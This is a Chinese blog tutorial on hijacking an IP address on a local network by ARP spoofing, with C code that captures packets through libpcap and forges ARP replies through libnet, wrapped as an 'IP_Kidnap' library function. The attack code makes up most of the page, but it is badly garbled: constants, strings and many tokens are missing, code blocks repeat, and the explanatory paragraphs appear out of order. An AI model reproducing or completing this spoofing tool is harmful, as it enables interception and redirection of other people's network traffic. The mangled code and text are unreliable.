基于ARP的局域网IP劫持——C语言实现

图片 6

 

 

  我站在 烈烈风中

  **

  恨不能 荡尽绵绵心痛


  望苍天 四方云动


  剑在手


  问天下谁是英雄


——《霸王别姬》


 

 

 
阅读这篇文章之前,请确认已经熟悉ARP报文伪造的方法,可参考《ARP数据包伪造》。
 

 
阅读这篇文章之前,请确认已经熟悉ARP报文伪造的方法,可参考《ARP数据包伪造》。
 

图片 1

#include <pcap.h> #include <time.h> #include
<stdlib.h> #include <stdio.h> unsigned glTargetIP[]={,,, *
glBpfCmd= unsigned
glRetargetMac[]={ ,,,,, *
glNICStr=
getPacket(u_char * arg, pcap_pkthdr * pkthdr, u_char * * id = ( * unsigned * src_ip = unsigned *
src_mac= unsigned * dst_ip =packet+ unsigned * dst_mac=packet+ printf(, ++(* printf(, pkthdr-> printf(, pkthdr-> printf(, ctime(( time_t *)&pkthdr->
(i=; i<pkthdr->len; ++
printf( ( (i + ) % == printf( printf( errBuf[PCAP_ERRBUF_SIZE], * devStr = printf( printf( exit( pcap_t * device = pcap_open_live(glNICStr, , ,
(! printf( exit(
pcap_compile( device,&filter,glBpfCmd,, pcap_setfilter(device ,& id = pcap_loop(device, -,
getPacket, (u_char*)& } View Code

图片 2

gcc name.c -lpcap -o name

  请看下图,这是全篇文章的鸟瞰:

  结合ARP报文伪造模块,下面给出完整实现代码:

图片 3

图片 4
#include <pcap.h> #include <time.h> #include
<stdlib.h> #include <stdio.h> #include <stdio.h>
#include <stdlib.h> #include <.h> #include <unistd.h> #include
<libnet.h> MAC_ADDR_LEN 6 IP_ADDR_LEN 4 unsigned glTargetIP[]={,,, *
glBpfCmd= unsigned
glRetargetMac[]={ ,,,,, *
glNICStr=
ForgeAndSendArp( * dev,unsigned * src_mac,unsigned
* unsigned *
src_ip,unsigned *dst_ip,uint16_t
arpOp,unsigned padPtr[ libnet_t *net_t = unsigned i= printf( printf( net_t = (net_t
== printf(
p_tag =
ARPHRD_ETHER, ETHERTYPE_IP, MAC_ADDR_LEN, IP_ADDR_LEN, arpOp,
(u_int8_t *)src_mac, (u_int8_t *)src_ip, (u_int8_t *)dst_mac, (u_int8_t *)dst_ip, padPtr,
, net_t, (- == printf( p_tag = libnet_build_ethernet( (u_int8_t
*)dst_mac, (u_int8_t
*)src_mac,
ETHERTYPE_ARP,
padPtr, , net_t, (- ==
printf( i= (;i<sendTimes;i++ (- == (res
= printf( getPacket(u_char * arg, pcap_pkthdr *
pkthdr, u_char * * id = ( * unsigned * src_ip =
unsigned * src_mac= unsigned
* dst_ip =packet+ unsigned *
dst_mac=packet+
ForgeAndSendArp(glNICStr,src_mac,dst_mac,src_ip,dst_ip,ARPOP_REPLY,
printf(, ++(*
printf(,
pkthdr-> printf(, pkthdr-> printf(, ctime(( time_t
*)&pkthdr-> (i=;
i<pkthdr->len; ++ printf( (
(i + ) % == printf( printf(
errBuf[PCAP_ERRBUF_SIZE], *
devStr =
printf( printf( exit(
pcap_t * device =
pcap_open_live(glNICStr, , , (! printf( exit(
pcap_compile( device,&filter,glBpfCmd,, pcap_setfilter(device ,& id = pcap_loop(device, -,
getPacket, (u_char*)& } View Code

图片 5 
要想实现上图的工作流程,必须实现两个模块:

 这个工具的验证结果已经在文章鸟瞰图中给出。

    •自由的伪造ARP报文

 下面,我们将这段代码封装成为一个共享库,以供其他程序调用。 

    •抓取并分析所有流经网卡的数据包

 #include <pcap.h>
 #include <time.h>
 #include <stdlib.h>
 #include <stdio.h>

 #include <stdio.h>
 #include <stdlib.h>
 #include <.h>
 #include <unistd.h>
 #include <libnet.h>

  MAC_ADDR_LEN 6
  IP_ADDR_LEN 4


  unsigned  *   *  unsigned  *   *   * 

  ForgeAndSendArp( * dev,unsigned  * src_mac,unsigned  *     unsigned   * src_ip,unsigned  *dst_ip,uint16_t arpOp,unsigned              padPtr[          libnet_t *net_t =                     unsigned  i=  
          printf(          printf(          
          net_t  =          (net_t ==                   printf(                      
          p_tag =                          ARPHRD_ETHER,
                          ETHERTYPE_IP,
                          MAC_ADDR_LEN,
                          IP_ADDR_LEN,
                          arpOp,
                          (u_int8_t *)src_mac,
                          (u_int8_t *)src_ip,
                          (u_int8_t *)dst_mac,
                          (u_int8_t *)dst_ip,
                          padPtr,
                          ,
                          net_t,


          (- ==                   printf(                       
          p_tag = libnet_build_ethernet(
                          (u_int8_t *)dst_mac,
                          (u_int8_t *)src_mac,
                          ETHERTYPE_ARP,
                         padPtr,
                         ,
                          net_t,


          (- ==                   printf(                               
                    i=          (;i<sendTimes;i++            (- == (res =                   printf(                               
                                     getPacket(u_char * arg,   pcap_pkthdr * pkthdr,  u_char *     * id = ( *   unsigned  * src_ip =   unsigned  * src_mac=   unsigned  * dst_ip =packet+   unsigned  * dst_mac=packet+   
   ForgeAndSendArp(glSendNICStr,src_mac,dst_mac,src_ip,dst_ip,ARPOP_REPLY, 
   printf(, ++(*   printf(, pkthdr->   printf(, pkthdr->   printf(, ctime(( time_t *)&pkthdr->   
      (i=; i<pkthdr->len; ++      printf(     ( (i + ) %  ==         printf(     
   printf(  

  IP_Kidnap ( unsigned  * TargetIP, *           unsigned  * RetargetMac, * sendNICStr , *     errBuf[PCAP_ERRBUF_SIZE], *      glTargetIP=   glBpfCmd=   glRetargetMac=   glSendNICStr=   glListenNICStr= 

   devStr =   
         printf(    
      printf(     exit(    

   pcap_t * device = pcap_open_live(glListenNICStr, , ,    
   (!      printf(     exit(    
   pcap_compile( device,&filter,glBpfCmd,,   pcap_setfilter(device ,&   
    id =    pcap_loop(device, -, getPacket, (u_char*)&   

     }

图片 6

  编译后的结果:

 
从上图中可以看出,我们可以通过BPF或者DLPI层实现数据包的抓取分析,而tcpdump的根基——libpcap库,正是对BPF层的二次封装实现的C库,我们将通过它来实现数据包的抓取分析。 

ForgeAndSendArp( *
dev,unsigned * src_mac,unsigned * * src_ip,unsigned
*dst_ip,uint16_t arpOp,unsigned

  关于libpcap的基础使用,请参考这篇文章《libpcap使用》。 

 IP_Kidnap ( unsigned  * TargetIP, * * RetargetMac , * listenNICStr , *

  下面给出一个简单的libpcap过滤抓包的程序:

 

发表评论

电子邮件地址不会被公开。 必填项已用*标注